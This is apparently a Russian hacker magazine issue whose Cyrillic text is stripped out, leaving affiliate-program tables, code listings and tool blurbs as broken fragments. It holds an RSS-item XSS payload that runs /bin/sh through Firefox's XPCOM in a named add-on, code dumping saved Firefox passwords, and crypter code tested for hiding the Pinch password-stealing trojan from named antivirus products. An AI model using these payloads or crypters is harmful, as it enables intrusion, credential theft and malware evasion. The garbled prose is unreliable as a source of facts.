., ., ., ., .,
., ., ., .

Visa, MasterCard,
ACH, Wire

Visa, MasterCard, ACH,


Wire, MoneyGram

Visa, MasterCard, ACH,


Wire, MoneyGram

Visa, EuroDebit, ACH, Wire

$100

$100

$50

$100

,
(
)


(10 ),

12 /155/ 2011

069

:
:
:


. .

. , , xhamster.com
,
.
, .
, ?
, -
.
, ,
.
$30.
-
4060%. , .
, .

(),
.




,

.
,
.
( ),

.

,
().

WordPress .

.
FGH ( ,

). ,
FGH
. , -
, ,
, .


Royal-Cash.com

EarnCoin.com

Aepartnership.com

FerroCash.com

CashManiacs.com

2001

2003

2003

1999

2003

/ -

5060% $3040

50%

50%

50%

50%

44

23

173

58

128

check, wire, Payoneer,


ACH, WebMoney,
Paxum, eCoin

check, wire,
WebMoney, Paxum,
eCoin, ePese

wire, Payoneer,
WebMoney, Paxum,
eCoin

Paxum,
ePayService

check, wire,
WebMoney, Paxum,
ePayService

$100

$100

$300

$50

070

12 /155/ 2011

:
:
:

PPC (PAY PER CLICK)

. Pay per
click . PPC- ,
-. ( ), , .
,
. , ,
. (bid) ,
() . , , ,
, -. PPC- .
, bid, .
, ,
.

,
PPC.
,
.

:

.
,
.


,
,


( ,
).

,
.
.


Bidtraffic.com

Click9.com

Peakclick.com

Daoclick.com

Thegreenppc.com

Bizzclick.com

2004

2008

2005

2009

2009

2009

/ -

7095%

70%

70%

80%

80%

75%

$40

$50

$100

$50

$50

$10

ePassporte,
PayPal,
StormPay,
EPESE,
WebMoney

Epese,
Webmoney,
Wire

Wire,
ePassporte,
Western Union,
WebMoney

Webmoney,
ePassporte,
EPESE,
PayPal, Wire

Webmoney, Wire,
PayPal

ePassporte, PayPal,
StormPay, EPESE,
Visa, MasterCard,
Western Union,
PayPal, Wire, Liberty
Reserve, WebMoney

12 /155/ 2011

071

:
:
:


.
. : , , .
,
, . , , .
, , ,

. (2045%)
.


(, ,
. .).

-,
,
. . ,
-.
.

, ,
.
,
,

.

, .

Uffiliates.com

Affactive.com

Fulltiltpoker.com

AffClub.com

Pokerstarspartners.com

2008

2009

2004

2007

2007

/ -

2540%

3045%

2035%
$70225

2540%
$50150

2030%
$75150

-,
,

-,

MoneyBookers,
Neteller, Wire,
Check

MoneyBookers,
Neteller,
Wire, Check,
Webmoney

Neteller, Visa,
MasterCard, Maestro,
EntroPay, Paysafecard,
Webmoney

Click2Pay, ClickandBuy,
EntroPay, Maestro,
MoneyBookers, Neteller,
Solo, Visa Delta, Visa
Electron, WebMoney, Wire

Instant eChecks,
Moneybookers,
ClickandBuy, Visa,
Neteller, Wire, Check,
WebMoney, EntroPay

072

12 /155/ 2011

:
:
:

,
. -
, , .
,
.
.
, .

( ),
,
.


-. ,
,
: -.

, , .

,
XML ,
.

.

,
.

Glavtorg.com

Stimul-Cash.com

Affiliate-program.Amazon.com

KingsProfit.com

2010

2010

1996

2010

()


()

()

/ -

2535%

25%

48%

25%

Webmoney, Epass,
PayPal, Wire

Webmoney, Epass, PayPal,


Wire, ePese, Moneybookers

Check

Webmoney, Wire

$100

$50

$10

$100

12 /155/ 2011

073

oxdef (oxdef.info)

Firefox


, ? , Firefox.


,
.
FIREFOX
Chrome (#06/11) Opera
(#06/11).
. -,
-
. Opera Google
Chrome, FF, ,
.
.
-
-
-.
Firesheep (codebutler.
github.com/firesheep), Wi-Fi

. ,
.
.

074

WWW


Mozilla:
mzl.la/u2Nol0.


Firefox Defcon 17:
bit.ly/u7BVcS.

,

:
bit.ly/sSzdbO.

Mozilla Firefox , , Mozilla


(Thunderbird, SeaMonkey . .) ,
:
XPI ( ) .
JavaScript JS, !
XUL (XML User Interface Language) XML .
DOM (Document Object Model) , .
CSS (Cascading Style Sheets) CSS- .
XPCOM/XPConnect .
, , , . XPI-.
, ZIP-
install.rdf XPInstall. :

chrome

content

browserOverlay.js

browserOverlay.xul

locale

en-US

browserOverlay.dtd

browserOverlay.properties

skin

browserOverlay.css
chrome.manifest
install.rdf

12 /155/ 2011

Firefox

Install.rdf ( RDF/XML),
.
: , , ,
, (
) . .
updateURL updateKey, .
install.rdf:
<?xml version="1.0"?>
<RDF xmlns="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
xmlns:em="http://www.mozilla.org/2004/em-rdf#">
<Description about="urn:mozilla:install-manifest">
<em:id>helloworld@oxdef.info</em:id>
<em:name>Hello World</em:name>
<em:description>Hello world!</em:description>
<em:version>0.1</em:version>
<em:creator>Oxdef</em:creator>
<em:homepageURL>http://oxdef.info</em:homepageURL>
<em:updateURL>https://oxdef.info/update
</em:updateURL>
<em:type>2</em:type>
<em:targetApplication><!-- Mozilla Firefox -->
<Description>
<em:id>{ec8030f7-c20a-464f-9b0e-13a3a9e97384}
</em:id>
<em:minVersion>3.0</em:minVersion>
<em:maxVersion>6.0.*</em:maxVersion>
</Description>
</em:targetApplication>
</Description>
</RDF>

Mozilla Firefox
XML- XUL (
), , , .
JavaScript, . . XPCOM (. Cross Platform
Component Object Model)
. , , , .
, JavaScript, Java, Python,
C++.
XPCOM-. XPConnect
,
(, ,
, ).
Gecko.
.
, , XPCOM- .
().
XUL- ( content).
XUL- JavaScript:

Mozilla Firefox

<menubar id="main-menubar">
<menu id="helloworld-hello-menu"
label="&helloworld.hello.label;"
accesskey="&helloworld.helloMenu.accesskey;"
insertafter="helpMenu">
<menupopup>
<menuitem id="helloworld-hello-menu-item"
label="&helloworld.hello.label2;"
accesskey="&helloworld.helloItem.accesskey;"
oncommand=
"XULSchoolChrome.BrowserOverlay.sayHello(event);" />
</menupopup>
</menu>
</menubar>


. , , (chrome://...),
. . chrome.manifest
chrome- ,
, , :
content
helloworld
chrome/content/
overlay chrome://browser/content/browser.xul chrome://
helloworld/content/browserOverlay.xul
skin
helloworld classic/1.0 chrome/skin/
locale
helloworld en-US
chrome/locale/en-US/


<script type="application/x-javascript"
src="chrome://helloworld/content/browserOverlay.js" />
<stringbundleset id="stringbundleset">
<stringbundle id="helloworld-string-bundle"
src="chrome://helloworld/locale/browserOverlay.properties"/>
</stringbundleset>

12 /155/ 2011

, , , .
:
addons.mozilla.org (. AMO);
.

075

,
.
: updateURL updateKey.
updateURL
, XML/RDF-
.
( )
.
<em:updateURL>http://www.foo.com/update.cgi?id=%ITEM_ID%
&amp;version=%ITEM_VERSION%</em:updateURL>
,
,
Wi-Fi. ,
Mozilla ,
HTTP- updateURL.

updateKey. ,
, ,
, :
<em:updateKey>MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDK42
6erD/H3XtsjvaB5+PJqbhjZc9EDI5OCJS8R3FIObJ9ZHJK1TXeaE7JWq
t9WUmBWTEFvwS+FI9vWu8058N9CHhDNyeP6i4LuUYjTURnn7Yw/Igz
yIJ2oKsYa32RuxAyteqAWqPT/J63wBixIeCxmysfawB/zH4KaPiY3vn
rzQIDAQAB</em:updateKey>

signature ( ) updateHash,
- xpi-
. McCoy
.
AMO
AMO. , ,
, updateURL.
,
:
*** LOG addons.updates: Requesting https://versioncheck.
addons.mozilla.org/update/VersionCheck.php?reqVersion=2&
id=inspector@mozilla.org&version=2.0.10&maxAppVersion=8.0a1&
status=userEnabled&appID={ec8030f7-c20a-464f-9b0e13a3a9e97384}&appVersion=5.0&appOS=Linux&appABI=x86_64-gcc3&
locale=en-US&currentAppVersion=5.0&updateType=97
*** LOG addons.xpi: Calling bootstrap method startup on jid0t3eeRQgGANLCH9c50lPqcTDuNng@jetpack version 0.0.19
*** LOG addons.updates: Requesting https://localhost/update.rdf
*** WARN addons.updates: HTTP Request failed for an unknown reason

,
, SSL. , , ,
.
AMO, -
. 20
AMO ,
AMO.

076

RSS-

AMO, ,
.
AMO , , - .

(
).
AMO, . ,
. AMO
AMO. : .
-
.
,
AMO.
, (
) AMO.
, ,
,
.
.
,
,
AMO.
. AMO.
, .
. , , .

. ,
,
. . ,
, ,
. .
:
JavaScript;
Remote XUL;
.


,
, AMO,
.
,
Opera Chrome.
,
. . , chrome://.
, XPCOM ,
.

12 /155/ 2011

Firefox

args=["-c","galculator"];
process.run(false,args,args.length);
})()+alert('XSS/foo
</link>
<pubDate>Sun, 21 Aug 2011 21:34:10 +0400</pubDate>
<description>some text</description>
</item>


XPCOM . ,

, .
, , URI data:..?
JS ,
- DOM Based XSS .
. , , , ,
, data-.
Simple RSS Reader AMO


.
, . ,
,
. , RSS-
, , - .
Simple RSS Reader (bit.ly/
t0oJO6),
.
RSS-, , . , - .
,
( ).
. , ,
feedUri.
- :
menuitem.setAttribute('onmouseover',
"SRR.setStatusBar('"+feedUri+"')");

RSS- (
XML-, )
, (
, ) ,
. :) -,
,
... ! !

(, !)
:
<item><title>some title</title>
<link>
data:eeee')+(function()
{
file=Components.classes["@mozilla.org/file/local;1"].
createInstance(Components.interfaces.nsILocalFile);
file.initWithPath("/bin/sh");
process=Components.classes["@mozilla.org/process/util;1"].
createInstance(Components.interfaces.nsIProcess);
process.init(file);

12 /155/ 2011


,
.
. .
-, ? -,
,
!
:
var dump = '';
try
{
var myLoginManager = Components.classes[
"@mozilla.org/login-manager;1"].
getService(Components.interfaces.nsILoginManager);
var logins = myLoginManager.getAllLogins({});
for (var i = 0; i < logins.length; i++)
{
dump = dump + logins[i].hostname + ':' +
logins[i].username + ':' + logins[i].password +
'\n';
}
alert(dump);
}
catch(ex)
{
// This will only happen if there is no
// nsILoginManager component class
}

, , eval()
. , , , AMO.

OUTRO
Add-on SDK, JetPack.
XUL!
JavaScript, HTML CSS.

. , ! ;) z

077

life4u (a.e.faronov@gmail.com)

:
AdSense




10 .


.
,
.

078

WWW
www.google.com/
adsense Google
AdSense;
direct.yandex.ru
.;
www.spybox.com.
ua
-
SpyBox;
www.adwatcher.com

Adwatcher;
jspy.ru

;
piwik.org

Piwik;
www.google.
com/analytics/
.

( . click fraud )
, () .
( ,
, ),
( ). ,
1015 % .
,
. PPC-.
,
. , . , .
AdSense .
,
. , ,

12 /155/ 2011

: AdSense

SpyBox

- Adwatcher

, , (
-, $0,1 ).
: , , - !
.
,
, , .
, , . . ,
,
.
, , .
.
, .
.
.
PPC- (Pay-perClick , ,

, ). ,
.
(, IP ).
,
.

12 /155/ 2011


, ,
,
.
,
.
1. IP-,
, - .
, IP
.
2. ,
, , :
,
,
.

079



?
:
PPC- ?
, /
. , . 2007
Yahoo! .
Checkmate Strategic Group.
Yahoo!
2004 .
2006 Google
90 .

,
,
.

3. , ,
( , , ), :
.
4. , , .
. :
, (, - ),
,
100.
.
5.
,
.

: SPYBOX
, .
. , / ,
,
. , 100 % , ( ,
).
-
SpyBox. , -,
, ,
, , ,
.
: HTML-,
</body>.
(
):
<noindex>
<script type='text/javascript'>
var script=document.createElement('script');

080

script.type='text/javascript';
...
if(localStorage.spybox)
{
var spybox_hash='a181a603769c1f98ad927e7367c7aa51';
var spybox_session=localStorage.spybox;
script.src='http://ua.robotreplay.net/fast.js';
}
...
document.getElementsByTagName("head")[0].
appendChild(script);
</script></noindex>


, , . :
, ,
- .

, . ,
IP

( ,
- ),
. . , SpyBox
: (
1000 ),
( , ,
,
).

ADWATCHER
SpyBox, , , .
,
, , ?
Adwatcher,
, SpyBox,

!
,
,
.
, !
2003 ,
Google 150 .
, ,
, Google
Clique , Google
. , Google ,
. ,
,
. , ,
2009 . Microsoft ,
,
Microsoft.
750 .
- .
, ,
.

12 /155/ 2011

: AdSense

- Adwatcher

,
Google Analytics

xakep.ru

.
-
( IP) (,
, , , , ).
( )
30- . ,
fraud reports, .
,
, ( ,
)
:
<script language="javascript" type="text/javascript">
...
document.write('
<img src="http://s8.adwatcher.net/demov3/tracker.
php?t='+ id[1]+'&ref='+r+'&land='+l+'"
style="border:0px;width:1px;height:1px;" />');
</script>

,

. Adwatcher 30
. ,
, ,
,
Adwatcher SpyBox.

12 /155/ 2011

,

: Google Analytics Piwik (
PHP-,
). , ,
,
. :
, ,
. , ,
( 40 ,
), ,
.

. ,

.
,
,
. ,

. ,

, .

, (
, ).
,
. ,
, ,
,

, :). z

081

(icq 884888, http://snipper.ru)

X-Tools


:
BECHED

:
Max Artemev

:
Zdez Bil Ya

URL:
bit.ly/nIXs3V

URL:
widecap.ru

URL:
bit.ly/qLkZuZ

:
*nix/win

:
Windows 2000/
XP/2003 Server/
Vista/2008 Server/7

:
Windows 2000/
XP/2003 Server/
Vista/2008 Server/7

WEB-SHELL
SSI

C
WIDECAP


TWITTER REGGER

, ,
PHP-
. ,
. ,
- - .

,
,
.
.
? ! SSI
(server side includes) ,
, #exec
cmd.

.

SSI-,

PHP. :
;
SSI- ;
;
HTTP_COOKIE;
JavaScript.

WideCap , TCP/IP- -
-.

Winsock.
: SOCKSv4, SOCKSv5, HTTP/
HTTPS.
:
1. .
:
, , DNS, , .
2. -, .
3. .

,
.
4. .

, .
,

.
, :
(
e-mail);
;
(, , );
( avatars);
;
.

082

, ,
WideCap - :).
: ,
, ,
,
- ..

, . , ,
.

name.txt.

accounts.txt.
,
.
,
.

12 /155/ 2011

X-Tools

:
S4(uR4
URL:
bit.ly/pxjMKi
:
*nix/win

ALANA K!LL3R
,
HTTP- Apache (bit.ly/rqvHBi),
,
.

, ,

!
Alana K!LL3R
S4(uR4
. ,
.
, PoC

killapache.pl Kingcope.
--
,

. S4(uR4
PHP + cURL
Perl ,
(, ,
. .).
:
GET- (byte ranges)
,
.

:
Gremwell

:
Danijel Maxa MaXoNe

:
VaZoNeZ

URL:
www.gremwell.com

URL:
bit.ly/orsqKn

URL:
vazonez.com/page/
stegano

:
*nix/win

:
Windows 2000/
XP/2003 Server/
Vista/2008 Server/7

: Windows
2000/XP/2003 Server/
Vista/2008 Server/7

MAGICTREE:

SQL- MAXSQLI
SYNTAX BUILDER


BMP-

-
,
, , nmap? ?
, MagicTree.

.

(W3AF,
Acunetix, OpenVAS, Nessus, Burp, nmap . .),

(, nmap nikto)
(HTML, MS Word .).
Tree ()
,
,
Magic ()
,
,
.
,
,
www.gremwell.com/
documentation.

/
/HTTP-/
SQL-,
MaxSQLi Syntax Builder,
SQL-.

SQLi, error based. :
;

UNION;
WAF
;
;
;
;
;
, ;

string integer based.


,
,
. , ,

. Stegano,

BMP.
,
:
1. -.
2.
.
3. (,
).
4. (

)
.

, , ,
,
,
SQL-.


,

: .

.

12 /155/ 2011

083

MALWARE

deeonis (deeonis@gmail.com)



. ,
,


,
.
.

084

, ,
. , - ,
exe-.
;).
,
-.
, .

. , , ,
-, .
.
,
,
. ,
. ,
.


1. Kaspersky Crystal. . Kaspersky
Crystal .
,
.
, .
2. Dr. Web Security Space. Dr. Web Security Space,
.

12 /155/ 2011

FLY-CODE, , ,
.
3. ESET NOD32 Smart Security 5. ESET NOD32
Smart Security 5. ,
. , ,
,
.
4. Avast! Free Antivirus.
Avast! Free Antivirus.
, ,
.



. exe ,
. PE-
.
,
.
.
exe, API,
exe, , .

,
HLL-. ,
,
. , .

Pinch. exe- , .
Trojan-PSW.Win32.LDPinch.dlt, Dr. Web Trojan.Packed.1197,
NOD32 Win32/PSW.LdPinch.NMJ, Avast ,
Win32:LdPinch-NO [Trj]. ,
notepad.exe. ,
.

1
.
MZ- PE-,

. - notepad.exe.
,
,
API- .
Kaspersky Cristal.
.
. NOD32 Smart Security , Win32/PSW.LdPinch.NMJ.
Avast ,
, .
,
. - , ,
:).

,
. , .
xor
PVOID cryptBinary(PVOID pfile, DWORD fsize)
{
DWORD key = 0x45F983A0;
PVOID crypt_file = new BYTE[fsize];
CopyMemory(crypt_file, pfile, fsize);
for (size_t i = 0; i < (fsize / sizeof(DWORD)); i++)
{
((DWORD*)(crypt_file))[i] ^= key;
}
return crypt_file;
}
, . , , .
, . Dr. Web
. NOD32 Smart Security 5 :
, .
Avast, .
. . , xor, , ?

2
.
32- .
xor. ,
, ,

12 /155/ 2011

xor

085

MALWARE

KASPERSKY?
, Kaspersky Crystal,
. -,
Trojan-PSW.Win32.LDPinch.dlt,
, ,
Trojan-PSW.Win32.LDPinch.zie.
, -
.
,
, . ,

.
, ,

,
. , ,
, ,
, ,
,
.

Pinch, -

3
, , xor ,
Kaspersky Dr. Web,
.
. 142-
. ,
API.
CreateFile,
ntldr. ,
, , ,
INVALID_HANDLE_VALUE.
. ,
, , ,
CreateFile.
CreateFile
PVOID cryptBinary(PVOID pfile, DWORD fsize)
{
PVOID crypt_file = new BYTE[fsize];
CopyMemory(crypt_file, pfile, fsize);
HANDLE h = CreateFileA("e:\\ntldr",
FILE_READ_ACCESS, 0, 0,
OPEN_EXISTING, 0, NULL);
if (h != INVALID_HANDLE_VALUE)
{
DWORD key = 0x45F983A0;
for (size_t i = 0;
i < (fsize / sizeof(DWORD));
i++)
{
((DWORD*)(crypt_file))[i] ^= key;
}
}
return crypt_file;
}

086

NOD32

, CreateFile
, INVALID_HANDLE_VALUE.
, , , API.
, ,
. ,
, Trojan-PSW.Win32.LDPinch.zie.
Dr. Web Security Space . ,
, Infected Archive. NOD32 Avast Free
Antivirus .
.

4
:
, , ,
?
, ? ,
,
PE- .
,
, , . , notepad.exe
,
.
, : ,
NOD32 Avast .
.
, . Pinch
.

12 /155/ 2011

5

. xor
, Dr. Web,
.
256
.
, .

PVOID cryptBinary(PVOID pfile, DWORD fsize)
{
DWORD key = 0x45F983A0;
PVOID crypt_file = new BYTE[fsize];
CopyMemory(crypt_file, pfile, fsize);
//
CopyMemory(
crypt_file,
(VOID*)(((BYTE*)pfile) + 0x100 ),
fsize - 0x100);
CopyMemory(
(VOID*)(((BYTE*)crypt_file) + (fsize - 0x100)),
pfile,
0x100);
for (size_t i = 0; i < (fsize / sizeof(DWORD)); i++)
{
((DWORD*)(crypt_file))[i] ^= key;
}
return crypt_file;
}
,
, 4. Kaspersky Crystal Dr. Web
, . ,
, , , ,
- . ,
, , .

6
.
.
, .
, , C++
:

void swapMemBlock(ULONG begin, ULONG end)
{
ULONG half = (end - begin) / 2;
if (half < 0x4)
return;
BYTE *buff = new BYTE[end - begin];
ZeroMemory(buff, end - begin);
CopyMemory(buff, (PVOID)begin, end - begin);
CopyMemory((PVOID)begin, &buff[half], half);
CopyMemory((PVOID)(begin + half), buff, half);

12 /155/ 2011

delete[] buff;
swapMemBlock(begin, begin + half);
swapMemBlock(begin + half, end);
}
. Kaspersky, , NOD32 - .

. Kaspersky Crystal
. ,
, .

, Kaspersky Crystal,
. ! Dr.Web Security
Space . FLY-CODE
, . ESET
NOD32 Smart Security 5 Avast! Free Antivirus,
,
xor. ,
,
.

. ! z

087

MALWARE

(201074@mail.ru)


,


,
,
, , ,
, HIPS . . (
, :) ).

, .
088

DVD


ClamWin,
ClamAV
Windows, AVZ


.

WWW


: goo.gl/Usltc.
goo.gl/Kq3kw
,
(
-),
(BlackCash).
goo.gl/uI848

C++, goo.gl/ubwgt

C++.

12 /155/ 2011

1. , (: virulist.com)


,
,
. ,
:
,
,
.
,

( 1).

, . ,
, , ,

.
,

.
: , ,
,
. .

:
.
.

2. md5- ClamAV
: md5-,

( )


.
() , . ,
,
, ,
. ,
,
, . , -

12 /155/ 2011

3. HEX- ClamAV

089

MALWARE

,

, , ,
iChecker.
, .
. ,
, :
, .

. , Panda Software UltraFast,
AVZ ,
( )
( ).
iSwift ( iStream)
iChecker
NTFS.

,
.

4. , AVZ

.
. ,
md5-
.

ClamAV. , ,
, .
: main.cvd
daily.cvd.
. 2
md5-.
: md5-, , .

: ; , ; ,

090

5.

( ); - ;
, , . .
,
HEX-,
( 20 400 ),
.
,

. ,
.
(
)
(
). 3
HEX- daily.cvd
ClamAV. , .
, :
, , .
, . ,
, . ,
( )
, HEX.
.

, .
,
, .
,
-.
,
( , ,
JS-,
).
( ), -

12 /155/ 2011

, ,
:
EXECUTE READ,
WRITE;
PE- ;
;
- .

6. Gigpycll Win32.Palevo

.
( API- FindFirst FindNext)
. , ,
, API- ( NtOpenFile NtCreateFile).
,
.
, ,
,

.

. , ,
,
( ,
). , , .

: ,

, .

, ,
.

,
. , ,

.
,

.
( ,
). ,
, , ,
.

12 /155/ 2011

, , ,
( , ;
).
, ,
. ,
,
. ,
.
,
. , .
, :
,
( );
, ( ).
, ? ,
. :

;
( ,
, ,
, ,
photo.jpg.exe);
( , ,

PE-, .pif .com);
(
.exe .pif).
, , AVZ ( 4).

,
.
. text.
PE- , ,
, jmp -
,
.
, , , ,
( 5).
,
, ,
.
, ,
(.text, .data, .idata, .rdata, .reloc, .rsrc). -

091

MALWARE
, API- , DLL , , ,
GetProcAddress ,
-
.
, ,
. , , .
.

7. API-,
DLL explorer.exe,


, ( 6).
- , , AntiVirus Plus
McAfee ,
. , - API-
URLDownloadToFile ShellExecute.
, , VirtualAlloc, WriteProcessMemory
CreateRemoteThread.
, . ,
, . ,
,
.
,
.
, . asm,
(
C#, C, C Builder VB). explorer.exe, , ,
,
, ,
, ( 7, 8).
, . ,
? ,
(
, ),

.

, . .
(AVZ, , UPX).

092

, , ,
.
:
,
;
,
;

.
.
- .
. , ,
. ,
.
, , .
( ,
, , ,
) ,
.
, .
,
, .
.
:
1. , ( , , ,
. .).
2. .
3. .
4. .
:
5. ( ,
,
, ).
6. ( , , ),
, 7 8 ,
(, ).
7. 9.
8. .
9. ( ,
).

12 /155/ 2011

8. API-, -,

10. ( EIP).
11. ( ,
,
).
.
, ,
,
. ,
, .
EDX, ESP EIP.
. EDX EIP
,
. ESP,
. ESP ,
.

.

12 /155/ 2011

,

, , .
.
(
), . ,
,

.
.

, , ,
, , , .
, , HIPS, ,
- . z

093

MALWARE

(www.esagelab.ru)


PoC

,

, , .

?
.

,
, , . ,

,
malware, , -. ,

? ? ,
,

,
.

:

, ,
.
, Dynamic Binary
Instrumentation Engine. ,
-
,
.

UnFSG (bit.ly/v1nV81), (bit.ly/vNYAYA).
,
.


, ,
.
:

, , ,
, . ,

094

12 /155/ 2011

CreateToolHelp32Snapshot() SpyEye,

, Fast Universal Unpacker (code.google.com/p/fuu/)


ap0x Unpack Engine (bit.ly/vDTZXp).
TitanEngine ReversingLabs (bit.ly/rEHXSq).
, - ,
.

.
,
, , ,
,
.


,
- (
,
), .

:
1. , CreateProcess() DEBUG_PROCESS.
2. WaitForDebugEvent()
,
.
3. , ,

. , SpyEye

12 /155/ 2011

CreateToolHelp32Snapshot(). ,
0xCC ( int 3) WriteProcessMemory().
4. ,
ReadProcessMemory()
.
,
, ,

. :
1. FileAlignment SectionAlignment.
2. ImageBase
,
.
3.
RawOffset VirtualOffset .
, , (
), , ,
IDA Pro LoadLibraryEx() DONT_RESOLVE_DLL_REFERENCES
.

PO: SIMPEUNPACKER

SimpeUnpacker,
GitHub
(github.com/Cr4sh/SimpleUnpacker). SimpeUnpacker
,
:

095

MALWARE

IDA Pro

> SimpleUnpacker.exe <input_file> --bp <module>!<function>

input_file
, , '--bp'
, .

'--bp' .
dumped.exe.
,
, .
SimpleUnpacker.exe SpyEye:
C:\> SimpleUnpacker.exe dropper.exe --bp kernel32.dll!
CreateToolhelp32Snapshot
[+] Breakpoint: kernel32.dll!CreateToolhelp32Snapshot()
[+] Process command line: "dropper.exe"
CREATE_PROCESS: ImageBase=0x00400000,
StartAddress=0x00420090
DLL_LOAD: 0x7c900000 "ntdll.dll"
DLL_LOAD: 0x7c800000 "C:\WINDOWS\system32\kernel32.dll"
[+] Breakpoint on kernel32.dll!CreateToolhelp32Snapshot()
has been set: 0x7c865b1f
DLL_LOAD: 0x7e410000 "C:\WINDOWS\system32\USER32.dll"
DLL_LOAD: 0x77f10000 "C:\WINDOWS\system32\GDI32.dll"
DLL_LOAD: 0x73000000 "C:\WINDOWS\system32\WINSPOOL.DRV"
DLL_LOAD: 0x77dd0000 "C:\WINDOWS\system32\ADVAPI32.dll"
DLL_LOAD: 0x77e70000 "C:\WINDOWS\system32\RPCRT4.dll"
DLL_LOAD: 0x77fe0000 "C:\WINDOWS\system32\Secur32.dll"
DLL_LOAD: 0x77c10000 "C:\WINDOWS\system32\msvcrt.dll"
DLL_LOAD: 0x3d930000 "C:\WINDOWS\system32\WININET.dll"
DLL_LOAD: 0x77f60000 "C:\WINDOWS\system32\SHLWAPI.dll"
DLL_LOAD: 0x78130000 "C:\WINDOWS\system32\urlmon.dll"
DLL_LOAD: 0x774e0000 "C:\WINDOWS\system32\ole32.dll"

096

DLL_LOAD: 0x77120000 "C:\WINDOWS\system32\OLEAUT32.dll"


DLL_LOAD: 0x3dfd0000 "C:\WINDOWS\system32\iertutil.dll"
EXCEPTION_BREAKPOINT at 0x7c90120e
CREATE_THREAD: StartAddress=0x00000000
DLL_LOAD: 0x76390000 "C:\WINDOWS\system32\IMM32.DLL"
DLL_LOAD: 0x773d0000 "C:\WINDOWS\WinSxS\x86_Microsoft.Win
dows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\
comctl32.dll"
CREATE_THREAD: StartAddress=0x7c8106e9
EXCEPTION_BREAKPOINT at 0x7c865b1f
[+] Breakpoint occurs: kernel32.dll!CreateToolhelp32Snapshot
[+] Dumping image 0x00400000 Size=0x0007d000
Fixing FileAlignment 0x00000200 -> 0x00001000
Fixing section raw address 0x00000400 -> 0x00001000
Fixing section raw address 0x00000400 -> 0x00040000
Fixing section raw address 0x00021600 -> 0x00062000
[+] Image dumped to "dumped.exe"
DONE

, -
,
. ,
, TOP 100 VirusTotal SpyEye. ,
70% (
SpyEye
, ). ,
,
.
,
, . z

12 /155/ 2011

M0r1arty (moriarty@front.ru)

PHP
PHP-
PHP
,
.

,
.

WARNING

DVD

,



mysql_connect.

12 /155/ 2011

WWW
devzone.zend.com/
article/1021
3
.
habrahabr.ru/blogs/
php/98862/

.
http://bit.ly/
nm0fTy

.
gnuwin32.sourceforge.net/
.
http://pecl.php.net/

.
http://bit.ly/n3pnhK

,
PHP .

PHP
, Extension
Writing . .


ext
PHP. , , . ,
: config.m4
config.w32. UNIX-,
Windows. configure
, ; ,

. .
,
Makefile .


MINIT.
, , INI entry . .

097


:
Zend, , php.ini,
dl, deprecated.
RINIT. ,
.
RSHUTDOWN. , , RINIT.
web- Zend MSHUTDOWN. . /
MINIT/MSHUTDOWN,
RINIT/RSHUTDOWN.


Zend
. , malloc/free/calloc/realloc . .,
- (. 1). Zend
: Non-Persistent ( e) Persistent (
pe). , Persistent
( ) , NonPersistent . , MINIT-RINIT-RSHUTDOWNMSHUTDOWN ,
emalloc, emalloc MINIT,
RINIT
. , Non-Persistent , Persistent . malloc/free
.

ZTS
, ,
. PHP ZTS (Zend Thread-Safety). ZTS TSRM
(Thread Safe Resource Management). ,

(), .
TSRM :
TSRM.h, ZEND_BEGIN_
MODULE_GLOBALS ZEND_END_MODULE_GLOBALS
,
, ( )
ZEND_DECLARE_MODULE_GLOBALS,
, MINIT ZEND_
INIT_MODULE_GLOBALS.
, - . PHP.
tsrm_tls_table resource_types_table,
tsrm_ls. :
static tsrm_tls_entry **tsrm_tls_table=NULL;
static tsrm_resource_type *resource_types_table=NULL;
void ***tsrm_ls;
typedef struct {
size_t size; //
ts_allocate_ctor ctor; //
ts_allocate_dtor dtor; //
int done; //
} tsrm_resource_type;
struct _tsrm_tls_entry {

098

GnuWin32 ,
UNIX

void **storage; //
int count; //- storage
THREAD_T thread_id; //
tsrm_tls_entry *next; //
};

tsrm_tls_table , tsrm_tls_enty .
resource_types_table, , , ( )
ZEND_INIT_MODULE_GLOBALS,
ts_allocate_id:
#define ZEND_INIT_MODULE_GLOBALS(module_name, \
globals_ctor, globals_dtor) \
ts_allocate_id(&module_name##_globals_id, \
sizeof(zend_##module_name##_globals), \
(ts_allocate_ctor) globals_ctor, \
(ts_allocate_dtor) globals_dtor);
TSRM_API ts_rsrc_id ts_allocate_id(ts_rsrc_id *rsrc_id,
size_t size, ts_allocate_ctor ctor,
ts_allocate_dtor dtor);

rsrc_id , , size
, ctor/dtor /
. ctor-, , , ,
( ).

12 /155/ 2011

PHP

tsrm_ls storage .
TSRMLS_C/TSRMLS_CC. ,
.
?
. tsrm_tls_table
. tsrm_tls_table resource_types_table SAPI,
tsrm_startup. tsrm_startup SAPI
tsrm_ls ts_resource_ex(0,NULL):
TSRM_API void *ts_resource_ex(
ts_rsrc_id id, THREAD_T *th_id);

ts_resource_ex tsrm_tls_table
tsrm_tls_entry , th_id ( NULL,
). ,
allocate_new_resource tsrm_tls_entry
, ,
tsrm_tls_entry.next .
TSRM. allocate_new_resource,
, storage .
( ) tsrm_resource_type.size,
(ctor) . , TSRM
. ( ) .


,

... . :
, .
, .
( ) .
PHP Windows.
PHP Linux ,
- .
PHP Windows. ,
.
, : nmake Makefile
Visual Studio php5ts.lib
. , ,
Windows, ,
?

PHP (goo.gl/TTgta). ,
. ,
VS2003, .


, GnuWin32.
(
Win-).
. MinGW. Cygwin, . ,
MinGW
./configure && make && make install.

12 /155/ 2011

,

PHP , ,
PHP libiconv. ,
, ,
MinGW PHP. .
. , MASM32
inc2l.exe.
inc- lib-.
_libiconv_version PROTO C ( , PHP
_libiconv_version). ...
PHP ,
. . ;)

. , VS2008.
PHP ( 5.3.8)
. (
, PHP).
, (
, - ),
. - GnuWin32?
, ,
, PHP,
Windows (,
). GnuWin32 ,
.
:
cd E:\gnuwin32\GetGnuWin32
download.bat
install E:\gnuwin32

PHP Apache, , MySQL- lib


include , , E:\dep.
. Visual
Studio. PHP. builconf, configure, nmake:
E:\php-5.3.8>buildconf
E:\php-5.3.8>configure --with-extra-libs=E:\dep\apache\
lib;E:\dep\mysql\lib;E:\gnuwin32\lib --with-extra-includes
=E:\dep\apache\include;E:\dep\mysql\include;E:\gnuwin32\
include --with-mysql=shared --with-mysqli=shared
--enable-pdo --with-pdo-mysql --with-pdo-sqlite=shared
--enable-mbstring=shared --with-curl=shared
--enable-apache2-2handler --enable-apache2-2filter
E:\php-5.3.8>nmake

,
